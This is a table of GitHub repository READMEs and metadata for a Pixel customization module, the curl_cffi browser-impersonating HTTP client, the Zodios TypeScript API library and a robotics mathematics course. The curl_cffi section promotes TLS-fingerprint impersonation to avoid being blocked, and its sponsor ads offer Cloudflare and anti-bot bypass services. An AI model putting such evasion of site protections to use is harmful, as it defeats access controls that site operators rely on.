| repo | readme | description | topics | releases | contributors | pulls | commits | issues | branches | workflows |
|---|---|---|---|---|---|---|---|---|---|---|
siavash79/PixelXpert | ### For Pixel Stock Android 12 and 13 (Up to Nov 2022 - AOSP 13R8):
[![Latest Release for A12 & A13 up to Nov 2022](https://img.shields.io/badge/Download-v2.4.1-blue)](https://github.com/siavash79/PixelXpert/releases/tag/v2.4.1)
### For Pixel Stock Android 13 and 14 (starting with Dec 2022 security patch):
[![Latest Release](https://img.shields.io/github/v/release/siavash79/PixelXpert?color=green&include_prereleases&label=Download%20Latest%20Stable)](https://github.com/siavash79/PixelXpert/releases/latest)
[![Latest Canary Release](https://img.shields.io/badge/Download%20Latest-Canary-blue)](https://github.com/siavash79/PixelXpert/releases/tag/canary_builds)
![Downloads - Stable channel](https://img.shields.io/github/downloads/siavash79/PixelXpert/total?color=red&label=Downloads%20-%20Stable%20Channel)
### **PixelXpert Support Channels:**
[![XDA URL](https://img.shields.io/twitter/url?label=XDA%20Developers&logo=XDA-Developers&style=social&url=http://XDA.PixelXpert.siava.sh)](http://XDA.PixelXpert.siava.sh)
[![Telegram URL](https://img.shields.io/badge/Telegram-Join-2CA5E?style=social&logo=telegram)](https://t.me/PixelXpert_Discussion)
![Header Image](https://github.com/siavash79/PixelXpert/blob/canary/.github/PixelXpert_Banner_1280.png?raw=true)
This is a mixed Xposed+Magisk module, made to allow customizations that are not originally designed into AOSP (Android Open Source Project). Please read through the sections below before heading to the download links.
<hr>
### **Features:**
Currently, PixelXpert offers customizations on different aspects of system framework and SystemUI, including:
- Status bar
- Quick Settings panel
- Lock screen
- Notifications
- Gesture Navigations
- Phone & Dialer
- Hotspot
- Package Manager
- Screen properties
<hr>
### **Compatibility:**
PixelXpert is only fully compatible with Pixel stock firmware. Custom ROMs are not tested and may not be fully (or even at all) compatible.
Here is the compatibility chart for different Android versions and QPRs:
- Android 12/12.1: [final version: v2.4.1](https://github.com/siavash79/PixelXpert/releases/tag/v2.4.1).
- Android 13 stable QPR1 (up until November 2022 firmware): [final version: v.2.4.1](https://github.com/siavash79/PixelXpert/releases/tag/v2.4.1).
- Android 13 stable QPR3 (starting from December 2022 firmware till QPR3): [starting with v.2.5](https://github.com/siavash79/PixelXpert/releases/tag/v2.5.0) up until the latest stable/canary versions.
- Android 14: [starting with v.2.9](https://github.com/siavash79/PixelXpert/releases/tag/v2.9.0) up until the latest stable/canary versions.
<hr>
- Android 14 QPR2 beta builds are not yet fully compatible. Please be patient while we iron out the incompatibilities caused by code changes in the source (source code is not available for QPR betas).
<hr>
### **Prerequisites:**
- Compatible ROM (see Compatibility text above)
- Device Rooted with Magisk 24.2+ or KSU
- LSPosed (Zygisk Version preferred)
<hr>
### **How to install:**
- Download the stable Magisk module matching your firmware, as described above
- Install it in Magisk/KSU
- Reboot (no bootloops are expected)
- Open PixelXpert app and apply changes
P.S. For KSU, there is an extra step of granting root access to PixelXpert, since it is not requested automatically as it is in Magisk.
<hr>
### **Release Variants:**
The module is released in two flavors with different manual download and update procedures. Both can use automated updates through the Magisk manager or through the in-app updater (for canary, updates will not count against the module's download count).
<ins>Stable release:</ins>
- Manual Install/Update: through the repository's GitHub release page (link below) AND through the in-app updater
<ins>Canary release:</ins>
- Manual Install/Update: through the repository's Actions page and the [Telegram channel](https://t.me/PixelXpert_Github) (the latest version is also available from [here](https://github.com/siavash79/PixelXpert/releases/tag/canary_builds))
*No matter which flavor you're on, you can always switch to the other one with the in-app updater
<hr>
### **Translations:**
[![Crowdin](https://badges.crowdin.net/aospmods/localized.svg)](https://crowdin.com/project/aospmods)
Want to help translate PixelXpert to your language? Visit [Crowdin](https://crowdin.com/project/aospmods)
<hr>
### **Donations:**
This project is open source and free to use, build, or copy. However, if you really feel like it, you can donate to your favorite charity on our behalf, or help fund education for children in need at [Child Foundation](https://mycf.childfoundation.org/s/donate).
<hr>
### **Credits / Thanks:**
- Android Team
- @topjohnwu for Magisk
- @rovo89 for Xposed
- Team LSPosed
- apsun@github for remote-preferences
- @nijel8 for double-tap to wake
**UI design:**
- @Mahmud0808
**Graphic design:**
- JstormZx@Telegram (Icon and Banner)
- RKBDI@Telegram (Icon)
**Brought to you by:**
@siavash79 & @ElTifo
<hr>
| mixed Xposed+Magisk module for customization of Google Pixel rom of Android 12+ | customization,magisk-module,xposed-module | 30 | 37 | 295 | 3,183 | 0 | 4 | 6 |
yifeikong/curl_cffi | # curl_cffi
![PyPI - Downloads](https://img.shields.io/pypi/dm/curl-cffi)
![PyPI - Python Version](https://img.shields.io/pypi/pyversions/curl_cffi)
[![PyPI version](https://badge.fury.io/py/curl-cffi.svg)](https://badge.fury.io/py/curl-cffi)
[![Generic badge](https://img.shields.io/badge/Telegram%20Group-join-blue?logo=telegram)](https://t.me/+lL9n33eZp480MGM1)
[![Generic badge](https://img.shields.io/badge/微信交流群-加入-brightgreen?logo=wechat)](./assets/wechat.jpg)
[Documentation](https://curl-cffi.readthedocs.io) | [中文 README](https://github.com/yifeikong/curl_cffi/blob/main/README-zh.md)
Python binding for [curl-impersonate](https://github.com/lwthiker/curl-impersonate)
via [cffi](https://cffi.readthedocs.io/en/latest/).
Unlike other pure Python HTTP clients like `httpx` or `requests`, `curl_cffi` can
impersonate browsers' TLS/JA3 and HTTP/2 fingerprints. If you are blocked by some
website for no obvious reason, you can give `curl_cffi` a try.
------
<a href="https://scrapfly.io/?utm_source=github&utm_medium=sponsoring&utm_campaign=curl_cffi" target="_blank"><img src="assets/scrapfly.png" alt="Scrapfly.io" width="149"></a>
[Scrapfly](https://scrapfly.io/?utm_source=github&utm_medium=sponsoring&utm_campaign=curl_cffi)
is an enterprise-grade solution providing Web Scraping API that aims to simplify the
scraping process by managing everything: real browser rendering, rotating proxies, and
fingerprints (TLS, HTTP, browser) to bypass all major anti-bots. Scrapfly also unlocks
observability by providing an analytical dashboard and measuring the success rate/block
rate in detail.
Scrapfly is a good option if you are looking for a cloud-managed solution for `curl_cffi`.
If you are managing TLS/HTTP fingerprints yourself with `curl_cffi`, they also maintain a
[curl to python converter](https://scrapfly.io/web-scraping-tools/curl-python/curl_cffi).
------
## Features
- Supports JA3/TLS and HTTP/2 fingerprint impersonation.
- Much faster than requests/httpx, on par with aiohttp/pycurl, see [benchmarks](https://github.com/yifeikong/curl_cffi/tree/main/benchmark).
- Mimics the requests API, no need to learn another one.
- Pre-compiled, so you don't have to compile on your machine.
- Supports `asyncio` with proxy rotation on each request.
- Supports HTTP/2, which requests does not.
- Supports WebSocket.
||requests|aiohttp|httpx|pycurl|curl_cffi|
|---|---|---|---|---|---|
|http2|❌|❌|✅|✅|✅|
|sync|✅|❌|✅|✅|✅|
|async|❌|✅|✅|❌|✅|
|websocket|❌|✅|❌|❌|✅|
|fingerprints|❌|❌|❌|❌|✅|
|speed|🐇|🐇🐇|🐇|🐇🐇|🐇🐇|
## Install

    pip install curl_cffi --upgrade

This should work on Linux, macOS and Windows out of the box.
If it does not work on your platform, you may need to compile and install `curl-impersonate`
first and set some environment variables like `LD_LIBRARY_PATH`.
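For example, a rough sketch of that fallback on Linux; the install prefix below is an assumption and depends on where you put the compiled curl-impersonate libraries:

    # Assumed layout: curl-impersonate libraries installed under /usr/local/lib
    export LD_LIBRARY_PATH=/usr/local/lib:$LD_LIBRARY_PATH
    pip install curl_cffi --upgrade
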
To install beta releases:

    pip install curl_cffi --upgrade --pre

To install the unstable version from GitHub:

    git clone https://github.com/yifeikong/curl_cffi/
    cd curl_cffi
    make preprocess
    pip install .
## Usage
`curl_cffi` comes with a low-level `curl` API and a high-level `requests`-like API.
Use the latest impersonate versions; do NOT copy `chrome110` from the examples below without checking whether a newer version is available.
### requests-like
```python
from curl_cffi import requests
# Notice the impersonate parameter
r = requests.get("https://tools.scrapfly.io/api/fp/ja3", impersonate="chrome110")
print(r.json())
# output: {..., "ja3n_hash": "aa56c057ad164ec4fdcb7a5a283be9fc", ...}
# the ja3n fingerprint should be the same as the target browser's
# To keep using the latest browser version as `curl_cffi` updates,
# simply set impersonate="chrome" without specifying a version.
# Other similar values are: "safari" and "safari_ios"
r = requests.get("https://tools.scrapfly.io/api/fp/ja3", impersonate="chrome")
# http/socks proxies are supported
proxies = {"https": "http://localhost:3128"}
r = requests.get("https://tools.scrapfly.io/api/fp/ja3", impersonate="chrome110", proxies=proxies)
proxies = {"https": "socks://localhost:3128"}
r = requests.get("https://tools.scrapfly.io/api/fp/ja3", impersonate="chrome110", proxies=proxies)
```
### Sessions
```python
from curl_cffi import requests

s = requests.Session()
# httpbin is a http test website, this endpoint makes the server set cookies
s.get("https://httpbin.org/cookies/set/foo/bar")
print(s.cookies)
# <Cookies[<Cookie foo=bar for httpbin.org />]>
# retrieve cookies again to verify
r = s.get("https://httpbin.org/cookies")
print(r.json())
# {'cookies': {'foo': 'bar'}}
```
Supported impersonate versions, as supported by my [fork](https://github.com/yifeikong/curl-impersonate) of [curl-impersonate](https://github.com/lwthiker/curl-impersonate):
However, only Chrome-like browsers are supported. Firefox support is tracked in [#59](https://github.com/yifeikong/curl_cffi/issues/59).
Browser versions will be added **only** when their fingerprints change. If a version, e.g.
chrome122, was skipped, you can simply impersonate it with your own headers and the previous version (see the sketch after the notes below).
- chrome99
- chrome100
- chrome101
- chrome104
- chrome107
- chrome110
- chrome116 <sup>[1]</sup>
- chrome119 <sup>[1]</sup>
- chrome120 <sup>[1]</sup>
- chrome123 <sup>[3]</sup>
- chrome124 <sup>[3]</sup>
- chrome99_android
- edge99
- edge101
- safari15_3 <sup>[2]</sup>
- safari15_5 <sup>[2]</sup>
- safari17_0 <sup>[1]</sup>
- safari17_2_ios <sup>[1]</sup>
Notes:
1. Added in version `0.6.0`.
2. Fixed in version `0.6.0`, previous http2 fingerprints were [not correct](https://github.com/lwthiker/curl-impersonate/issues/215).
3. Added in version `0.7.0`.
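For example, to approximate a skipped version (such as a hypothetical `chrome122` profile), you can reuse the closest supported fingerprint and supply your own headers. This is only a sketch; the User-Agent value is a placeholder you would replace with the real string for the browser you want to mimic:

```python
from curl_cffi import requests

# Sketch: mimic a skipped version by combining the closest supported
# fingerprint (chrome120) with custom headers. The UA below is a placeholder.
r = requests.get(
    "https://tools.scrapfly.io/api/fp/ja3",
    impersonate="chrome120",
    headers={"User-Agent": "Mozilla/5.0 (placeholder Chrome/122 UA string)"},
)
print(r.json())
```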
### asyncio
```python
from curl_cffi.requests import AsyncSession
async with AsyncSession() as s:
    r = await s.get("https://example.com")
```
More concurrency:
```python
import asyncio
from curl_cffi.requests import AsyncSession
urls = [
    "https://google.com/",
    "https://facebook.com/",
    "https://twitter.com/",
]
async with AsyncSession() as s:
    tasks = []
    for url in urls:
        task = s.get(url)
        tasks.append(task)
    results = await asyncio.gather(*tasks)
```
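Per-request arguments can be combined with this pattern to rotate proxies on each request, as mentioned in the feature list. A minimal sketch, assuming the proxy URLs are placeholders for your own pool and that the per-request `proxies` argument behaves the same in `AsyncSession` as in the sync API shown earlier:

```python
import asyncio
from curl_cffi.requests import AsyncSession

# Placeholder proxy pool -- replace with real proxy URLs.
proxy_pool = [
    {"https": "http://proxy-a.example.com:3128"},
    {"https": "http://proxy-b.example.com:3128"},
]

async def main():
    async with AsyncSession() as s:
        tasks = [
            # Pick a different proxy from the pool for each request.
            s.get("https://example.com", proxies=proxy_pool[i % len(proxy_pool)])
            for i in range(4)
        ]
        results = await asyncio.gather(*tasks)
        print([r.status_code for r in results])

asyncio.run(main())
```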
### WebSockets
```python
from curl_cffi.requests import Session, WebSocket
def on_message(ws: WebSocket, message):
    print(message)

with Session() as s:
    ws = s.ws_connect(
        "wss://api.gemini.com/v1/marketdata/BTCUSD",
        on_message=on_message,
    )
    ws.run_forever()
```
For low-level APIs, Scrapy integration and other advanced topics, see the
[docs](https://curl-cffi.readthedocs.io) for more details.
## Acknowledgement
- Originally forked from [multippt/python_curl_cffi](https://github.com/multippt/python_curl_cffi), which is under the MIT license.
- Headers/Cookies files are copied from [httpx](https://github.com/encode/httpx/blob/master/httpx/_models.py), which is under the BSD license.
- Asyncio support is inspired by Tornado's curl http client.
- The WebSocket API is inspired by [websocket_client](https://github.com/websocket-client/websocket-client).
## [Sponsor] Bypass Cloudflare with API
<a href="https://yescaptcha.com/i/stfnIO" target="_blank"><img src="assets/yescaptcha.png" alt="Yes Captcha!" height="47" width="149"></a>
Yescaptcha is a proxy service that bypasses Cloudflare and uses the API interface to obtain verified cookies (e.g. `cf_clearance`). Click [here](https://yescaptcha.com/i/stfnIO) to register: https://yescaptcha.com/i/stfnIO
## [Sponsor] ScrapeNinja
<a href="https://scrapeninja.net?utm_source=github&utm_medium=banner&utm_campaign=cffi" target="_blank"><img src="https://scrapeninja.net/img/logo_with_text_new5.svg" alt="Scrape Ninja" width="149"></a>
[ScrapeNinja](https://scrapeninja.net?utm_source=github&utm_medium=banner&utm_campaign=cffi) is a web scraping API with two engines: a fast one, with high performance and TLS
fingerprinting; and a slower one with a real browser under the hood.
ScrapeNinja handles headless browsers, proxies, timeouts, retries, and helps with data
extraction, so you can just get the data in JSON. Rotating proxies are available out of
the box on all subscription plans.
## Sponsor
<a href="https://buymeacoffee.com/yifei" target="_blank"><img src="https://cdn.buymeacoffee.com/buttons/default-orange.png" alt="Buy Me A Coffee" height="41" width="174"></a>
## Citation
If you find this project useful, please cite it as below:
```
@software{Kong2023,
author = {Yifei Kong},
title = {curl_cffi - A Python HTTP client for impersonating browser TLS and HTTP/2 fingerprints},
year = {2023},
publisher = {GitHub},
journal = {GitHub repository},
url = {https://github.com/yifeikong/curl_cffi},
}
```
| Python binding for curl-impersonate via cffi. A http client that can impersonate browser tls/ja3/http2 fingerprints. | curl,http-client,curl-impersonate,http,https,ja3,ja3-fingerprint,tls-fingerprint,fingerprinting,web-scraping | 8 | 23 | 71 | 267 | 30 | 5 | 1 |
ecyrbe/zodios | <h1 align="center">Zodios</h1>
<p align="center">
<a href="https://github.com/ecyrbe/zodios">
<img align="center" src="https://raw.githubusercontent.com/ecyrbe/zodios/main/docs/logo.svg" width="128px" alt="Zodios logo">
</a>
</p>
<p align="center">
Zodios is a typescript api client and an optional api server with auto-completion features backed by <a href="https://axios-http.com" >axios</a> and <a href="https://github.com/colinhacks/zod">zod</a> and <a href="https://expressjs.com/">express</a>
<br/>
<a href="https://www.zodios.org/">Documentation</a>
</p>
<p align="center">
<a href="https://www.npmjs.com/package/@zodios/core">
<img src="https://img.shields.io/npm/v/@zodios/core.svg" alt="langue typescript">
</a>
<a href="https://www.npmjs.com/package/@zodios/core">
<img alt="npm" src="https://img.shields.io/npm/dw/@zodios/core">
</a>
<a href="https://github.com/ecyrbe/zodios/blob/main/LICENSE">
<img alt="GitHub" src="https://img.shields.io/github/license/ecyrbe/zodios">
</a>
<img alt="GitHub Workflow Status" src="https://img.shields.io/github/actions/workflow/status/ecyrbe/zodios/ci.yml?branch=main">
</p>
<p align="center">
<img alt="Bundle Size" src="https://img.shields.io/bundlephobia/minzip/@zodios/core?label=%40zodios%2Fcore"/>
<img alt="Bundle Size" src="https://img.shields.io/bundlephobia/minzip/@zodios/fetch?label=%40zodios%2Ffetch"/>
<img alt="Bundle Size" src="https://img.shields.io/bundlephobia/minzip/@zodios/axios?label=%40zodios%2Faxios"/>
<img alt="Bundle Size" src="https://img.shields.io/bundlephobia/minzip/@zodios/react?label=%40zodios%2Freact"/>
<img alt="Bundle Size" src="https://img.shields.io/bundlephobia/minzip/@zodios/express?label=%40zodios%2Fexpress"/>
<img alt="Bundle Size" src="https://img.shields.io/bundlephobia/minzip/@zodios/openapi?label=%40zodios%2Fopenapi"/>
<img alt="Bundle Size" src="https://img.shields.io/bundlephobia/minzip/@zodios/testing?label=%40zodios%2Ftesting"/>
</p>
https://user-images.githubusercontent.com/633115/185851987-554f5686-cb78-4096-8ff5-c8d61b645608.mp4
# What is it ?
It's an axios compatible API client and an optional expressJS compatible API server with the following features:
- really simple centralized API declaration
- typescript autocompletion in your favorite IDE for URL and parameters
- typescript response types
- parameters and responses schema thanks to zod
- response schema validation
- powerful plugins like the `fetch` adapter or automatic `auth` injection
- all axios features available
- `@tanstack/query` wrappers for react and solid (vue, svelte, etc, soon)
- all expressJS features available (middlewares, etc.)
**Table of contents:**
- [What is it ?](#what-is-it-)
- [Install](#install)
- [Client and api definitions :](#client-and-api-definitions-)
- [Server :](#server-)
- [How to use it on client side ?](#how-to-use-it-on-client-side-)
- [Declare your API with zodios](#declare-your-api-with-zodios)
- [API definition format](#api-definition-format)
- [Full documentation](#full-documentation)
- [Ecosystem](#ecosystem)
- [Roadmap](#roadmap)
- [Dependencies](#dependencies)
# Install
## Client and api definitions :
```bash
> npm install @zodios/core
```
or
```bash
> yarn add @zodios/core
```
## Server :
```bash
> npm install @zodios/core @zodios/express
```
or
```bash
> yarn add @zodios/core @zodios/express
```
# How to use it on client side ?
For an almost complete example of how to use zodios and how to split your API declarations, take a look at the [dev.to](examples/dev.to/) example.
## Declare your API with zodios
Here is an example of API declaration with Zodios.
```typescript
import { Zodios } from "@zodios/core";
import { z } from "zod";
const apiClient = new Zodios(
  "https://jsonplaceholder.typicode.com",
  // API definition
  [
    {
      method: "get",
      path: "/users/:id", // auto detect :id and ask for it in apiClient get params
      alias: "getUser", // optional alias to call this endpoint with it
      description: "Get a user",
      response: z.object({
        id: z.number(),
        name: z.string(),
      }),
    },
  ],
);
```
Calling this API is now easy and has built-in autocomplete features:
```typescript
//   typed                       auto-complete path     auto-complete params
//     ▼                                   ▼                       ▼
const user = await apiClient.get("/users/:id", { params: { id: 7 } });
console.log(user);
```
It should output
```js
{ id: 7, name: 'Kurtis Weissnat' }
```
You can also use aliases:
```typescript
//   typed                      alias        auto-complete params
//     ▼                          ▼                   ▼
const user = await apiClient.getUser({ params: { id: 7 } });
console.log(user);
```
## API definition format
```typescript
type ZodiosEndpointDescriptions = Array<{
  method: 'get' | 'post' | 'put' | 'patch' | 'delete';
  path: string; // example: /posts/:postId/comments/:commentId
  alias?: string; // example: getPostComments
  immutable?: boolean; // flag a post request as immutable to allow it to be cached with react-query
  description?: string;
  requestFormat?: 'json' | 'form-data' | 'form-url' | 'binary' | 'text'; // defaults to json if not set
  parameters?: Array<{
    name: string;
    description?: string;
    type: 'Path' | 'Query' | 'Body' | 'Header';
    schema: ZodSchema; // you can use zod `transform` to transform the value of the parameter before sending it to the server
  }>;
  response: ZodSchema; // you can use zod `transform` to transform the value of the response before returning it
  status?: number; // defaults to 200; you can use this to override the success status code of the response (only useful for openapi and express)
  responseDescription?: string; // optional response description of the endpoint
  errors?: Array<{
    status: number | 'default';
    description?: string;
    schema: ZodSchema; // transformations are not supported on error schemas
  }>;
}>;
```
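As a concrete illustration of this format, here is a sketch of an endpoint that uses `parameters` and `errors`; the URL, schemas and alias are invented for the example and are not part of any real API:

```typescript
import { Zodios } from "@zodios/core";
import { z } from "zod";

// Hypothetical endpoint: create a comment on a post.
const apiClient = new Zodios("https://example.com/api", [
  {
    method: "post",
    path: "/posts/:postId/comments",
    alias: "createComment",
    description: "Create a comment on a post",
    parameters: [
      {
        name: "body",
        type: "Body",
        schema: z.object({ text: z.string() }),
      },
    ],
    response: z.object({ id: z.number(), text: z.string() }),
    errors: [
      {
        status: 404,
        description: "Post not found",
        schema: z.object({ message: z.string() }),
      },
    ],
  },
]);

// The body shape and the :postId path parameter are both inferred and type-checked.
const comment = await apiClient.createComment(
  { text: "Nice post!" },
  { params: { postId: 1 } }
);
console.log(comment);
```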
# Full documentation
Check out the [full documentation](https://www.zodios.org) or following shortcuts.
- [API definition](https://www.zodios.org/docs/category/zodios-api-definition)
- [Http client](https://www.zodios.org/docs/category/zodios-client)
- [React hooks](https://www.zodios.org/docs/client/react)
- [Solid hooks](https://www.zodios.org/docs/client/solid)
- [API server](http://www.zodios.org/docs/category/zodios-server)
- [Nextjs integration](http://www.zodios.org/docs/server/next)
# Ecosystem
- [openapi-zod-client](https://github.com/astahmer/openapi-zod-client): generate a zodios client from an openapi specification
- [@zodios/express](https://github.com/ecyrbe/zodios-express): full end to end type safety like tRPC, but for REST APIs
- [@zodios/plugins](https://github.com/ecyrbe/zodios-plugins) : some plugins for zodios
- [@zodios/react](https://github.com/ecyrbe/zodios-react) : a react-query wrapper for zodios
- [@zodios/solid](https://github.com/ecyrbe/zodios-solid) : a solid-query wrapper for zodios
# Roadmap for v11
- [x] Validation-library agnostic, with type providers for `Zod` / `Io-Ts`:
  - By using the TypeProvider pattern we can now make zodios validation agnostic.
  - Implement at least ZodTypeProvider and IoTsTypeProvider since they both support `input` and `output` type inference
  - openapi generation will only be compatible with zod though
  - Not a breaking change so no codemod needed
- [x] MonoRepo:
  - Zodios will become a really large project so maybe migrate to turbo repo + pnpm
  - not a breaking change
- [ ] Transform:
  - By default, activate transforms on backend and disable on frontend (today it's the opposite); this would make server transform code simpler, since with this option we could activate any transforms, not just zod defaults.
  - Rationale being that transformation can be viewed as business code that should be kept on backend
  - breaking change => codemod to keep current defaults by setting them explicitly
- [x] Axios:
  - Move Axios client to its own package `@zodios/axios` and keep `@zodios/core` with only common types and helpers
  - Move plugins to `@zodios/axios-plugins`
  - breaking change => easy to do a codemod for this
- [x] Fetch:
  - Create a new Fetch client with almost the same features as axios, but without the axios dependency: `@zodios/fetch`
  - Today we have fetch support with a plugin for the axios instance (zodios maintains its own axios network adapter for fetch). But since axios interceptors are not used by zodios plugins, we can make the fetch implementation lighter than an axios instance.
  - Create plugins package `@zodios/fetch-plugins`
  - Not sure it's doable without a lot of effort to keep it in sync/compatible with the axios client
  - new feature, so no codemod needed
- [ ] React/Solid:
  - make ZodiosHooks independent of the Zodios client instance (axios, fetch)
  - not a breaking change, so no codemod needed
- [x] Client Request Config:
  - uniform Query/Mutation with the body sent on the config and not as a standalone object. This would allow `client.deleteUser({ params: { id: 1 } })` instead of `client.deleteUser(undefined, { params: { id: 1 } })`
  - breaking change, so a codemod would be needed, but might be difficult to implement
- [x] Mock/Tests:
  - if we implement an abstraction layer for the client instance, relying on moxios to mock API responses will likely not work for the fetch implementation.
  - create a `@zodios/testing` package that works for both axios/fetch clients
  - new feature, so no breaking change (no codemod needed)
Do you have other ideas? [Let me know!](https://github.com/ecyrbe/zodios/discussions)
# Dependencies
Even when used from pure JavaScript, Zodios is better suited to working with a TypeScript Language Server to handle autocompletion,
so you should at least use the one provided by your IDE (VS Code integrates a TypeScript language server).
However, we will only support fixing bugs related to typings for TypeScript language versions from v4.5 on.
Earlier versions should work, but do not have the TS tail recursion optimisation that impacts the size of the API you can declare.
Also note that Zodios does not embed any dependencies. It's your job to install the peer dependencies you need.
Internally Zodios uses these libraries on all platforms:
- zod
- axios
| typescript http client and server with zod validation | zod,http,typescript,api,nodejs,openapi,rest | 69 | 25 | 386 | 843 | 10 | 8 | 2 |
michiganrobotics/rob501 | # Robotics 501: Mathematics for Robotics
ROB 501: Mathematics for Robotics is a graduate-level course at the University of Michigan that introduces applied mathematics for robotics engineers.
Topics include vector spaces, orthogonal bases, projection theorem, least squares, matrix factorizations, Kalman filter and underlying probabilistic concepts, norms, convergent sequences, contraction mappings, Newton Raphson algorithm, local vs global convergence in nonlinear optimization, convexity, linear and quadratic programs.
This offering of the course is from Fall 2018.
## Prerequisites
It is assumed that students:
- know basic matrix algebra, such as how to multiply and invert matrices, what the rank of a matrix is, and how to compute eigenvectors;
- know how to compute means and variances given the density of a continuous random variable, and what conditional probability is and how to compute it;
- know vector calculus, and will review how to compute gradients of functions and the method of Lagrange multipliers;
- know simple properties of complex numbers;
- know how to use MATLAB, including plotting, the various types of multiplication such as `*` vs `.*` (star vs dot star), writing a for loop, and finding help.
## Lecture Videos, Textbook & Notes
All lecture videos are available on YouTube:
[ROB 501 Fall 2018 videos](https://www.youtube.com/playlist?list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH)
Also, the [textbook](https://github.com/michiganrobotics/rob501/tree/main/Textbook/ROB501_Textbook2022_03_21.pdf), [lecture notes](https://github.com/michiganrobotics/rob501/tree/main/Lecture%20Notes) and [handouts](https://github.com/michiganrobotics/rob501/tree/main/Handouts) are available.
## Recitations
[Recitation questions and answers](https://github.com/michiganrobotics/rob501/tree/main/Recitations) are both available.
## Course Plan
| Lecture | Topic | YouTube | Assignments Due |
|---------|------------------------------------------------------------|----------------------------------------------------------------------------------------------|--------------------|
| 1 | Intro & Proofs | [Video](https://www.youtube.com/watch?v=2-aK25lBzvI&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=1) | |
| 2 | Induction, Fundamental Theorem, & Contradiction | [Video](https://www.youtube.com/watch?v=f559OMvSGMg&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=2) | |
| 3 | Abstract Linear Algebra | [Video](https://www.youtube.com/watch?v=eZxsj8k-UbY&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=3) | |
| 4 | Subspaces & Linear Independence | [Video](https://www.youtube.com/watch?v=PL6AkVR-HUk&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=4) | [Homework 1](https://github.com/michiganrobotics/rob501/blob/main/Homework/Homework%2001.pdf) |
| 5 | Basis Vectors & Dimension | [Video](https://www.youtube.com/watch?v=B-x9uuBcQac&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=5) | |
| 6 | Linear Operators & Eigenvalues | [Video](https://www.youtube.com/watch?v=89QF687IeT8&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=6) | [Homework 2](https://github.com/michiganrobotics/rob501/blob/main/Homework/Homework%2002.pdf) |
| 7 | Similar Matrices & Norms | [Video](https://www.youtube.com/watch?v=yTd33p8pmaY&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=7) | |
| 8 | Inner Product Spaces | [Video](https://www.youtube.com/watch?v=Gp_z3aLpTyY&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=8) | [Homework 3](https://github.com/michiganrobotics/rob501/blob/main/Homework/Homework%2003.pdf) |
| 9 | Projection Theorem & Gram-Schmidt | [Video](https://www.youtube.com/watch?v=Bg6JdhoHyn0&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=9) | |
| 10 | Normal Equations & Least Squares | [Video](https://www.youtube.com/watch?v=y5Ef5UriN58&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=10) | [Homework 4](https://github.com/michiganrobotics/rob501/blob/main/Homework/Homework%2004.pdf) |
| 11 | Symmetric & Orthogonal Matrices | [Video](https://www.youtube.com/watch?v=-rp1jsBV7x8&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=11) | |
| 12 | Positive Semi-Definite Matrices & Schur Complement Theorem | [Video](https://www.youtube.com/watch?v=iyvfKlZuG-g&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=12) | [Homework 5](https://github.com/michiganrobotics/rob501/blob/main/Homework/Homework%2005.pdf) |
| 13 | Recursive Least Squares & Kalman Filter | [Video](https://www.youtube.com/watch?v=Ha2ls-aLmgs&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=13) | |
| 14 | Least Squares & Probability | [Video](https://www.youtube.com/watch?v=QwjS-0fInnQ&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=14) | |
| 15 | Best Linear Unbiased Estimator | [Video](https://www.youtube.com/watch?v=4ah5DzYjFUE&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=15) | [Homework 6](https://github.com/michiganrobotics/rob501/blob/main/Homework/Homework%2006.pdf) |
| 16 | QR Factorization | [Video](https://www.youtube.com/watch?v=AqPpZyLf37I&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=16) | [Exam 1](https://github.com/michiganrobotics/rob501/tree/main/Exams) |
| 17 | Modified Gram-Schmidt & Minimum Variance Estimator | [Video](https://www.youtube.com/watch?v=hVnJiNXJTAs&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=17) | |
| 18 | Probability Space & Random Variables | [Video](https://www.youtube.com/watch?v=dnMH9sCuudA&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=18) | |
| 19 | Gaussian Random Vectors | [Video](https://www.youtube.com/watch?v=jPSRL_PABVI&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=19) | [Homework 7](https://github.com/michiganrobotics/rob501/blob/main/Homework/Homework%2007.pdf) |
| 20 | Real Analysis & Normed Spaces | [Video](https://www.youtube.com/watch?v=9Hvq-Fe6YmM&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=20) | |
| 21 | Real Analysis & Interior of a Set | [Video](https://www.youtube.com/watch?v=v25gVgzrqHg&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=21) | [Homework 8](https://github.com/michiganrobotics/rob501/blob/main/Homework/Homework%2008.pdf) |
| 22 | Newton-Raphson Algorithm | [Video](https://www.youtube.com/watch?v=oAw2mqSoRr4&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=22) | |
| 23 | Cauchy Sequences | [Video](https://www.youtube.com/watch?v=IVx2SvN4hQ8&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=23) | [Homework 9](https://github.com/michiganrobotics/rob501/blob/main/Homework/Homework%2009.pdf) |
| 24 | Continuous Functions | [Video](https://www.youtube.com/watch?v=_2CcWd4qryU&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=24) | |
